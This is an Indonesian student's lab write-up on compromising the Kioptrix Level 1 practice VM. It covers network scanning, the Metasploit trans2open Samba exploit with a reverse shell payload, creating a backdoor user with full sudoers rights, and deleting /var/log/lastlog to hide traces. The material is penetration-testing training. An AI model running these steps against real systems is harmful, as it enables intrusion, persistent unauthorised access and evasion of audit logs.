Sabtu, 24 Oktober 2020

Writeup Eksploitasi Kioptrix Lv. 1 - SYAHDIKA BOBBY - 6702180092 - D3TK-42-03

 Writeup Kioptrix Level 1

OS Kioptrix merupakan sebuah Operating System yang di buat untuk di acak — acak, di “maling” dengan tujuan pembelajaran dalam bidang penetration testing

Langkah pertama

ifconfig lalu cari ip yang sedang digunakan



Gunakan netdiscover, yaitu sebuah tool yang dapat digunakan untuk proses scanning dalam pencarian IP   

netdiscover -r 192.168.36.128/24


Gunakan NMAP merupakan sebuah tool yang dapat digunakan untuk melakukan port scanning

nmap -sS  192.168.36.1

nmap -sS  192.168.36.2

nmap -sS  192.168.36.129

nmap -sS  192.168.36.254


Gunakan nbtscan, nbtscan adalah program untuk pemindaian jaringan IP untuk informasi nama NetBIOS

nbtscan 192.168.36.1

Ternyata ip 192.168.36.1 adalah ip desktop yang sedang digunakan.

Lalu coba > nbtscan 192.168.36.129

ketemu hasil dari nbtscan dengan os yang bernama Kioptrix.


Masuk ke > msfconsole

Msfconsole adalah sebuah software yang di gunakan untuk penetration system, mudah di gunakan dan juga memiliki banyak modul dari database sistem yang ada, tool ini menjadi andalan bagi semua penetration user untuk menggunakanya sebagai alat bantu untuk menguji sistem 

use auxiliary/scanner/smb/smb_version

Auxiliary adalah menu tambahan yang di gunakan oleh user untuk memodifikasi serangan dan membuat sistem tertembus dengan menggunakan exploit yang sudah di exploitasi , dengan menggunakan menu auxiliary semakin mudah untuk merancang dan menguji sistem yang mereka gunakan


set RHOSTS 192.168.36.129

RHOSTS berfunsi untuk menentukan IP Target

ketik "run"

lalu ketik "exit"


masuk lagi ke msfconsole

search trans2open

Lalu ketik "use exploit/linux/samba/trans2open"


set RHOSTS 192.168.36.129

lalu ketik "run"


Ketik "set payload generic/shell_reverse_tcp"

Lalu ketik "run"

Masuk ke shell reverse dan ketik "whoami" lalu enter

Dan untuk konfigurasi ulang password ketik "passwd"


Tahap maintaining access pada Kioptrix

adduser syahdika

passwd syahdika

> Set password dari user syahdika


pico /etc/sudoers

syahdika ALL=(ALL) ALL

ctrl + x, y > save

Menghapus log

rm -rf /var/log/lastlog


ATAU SIMAK VIDEO LENGKAPNYA DISINI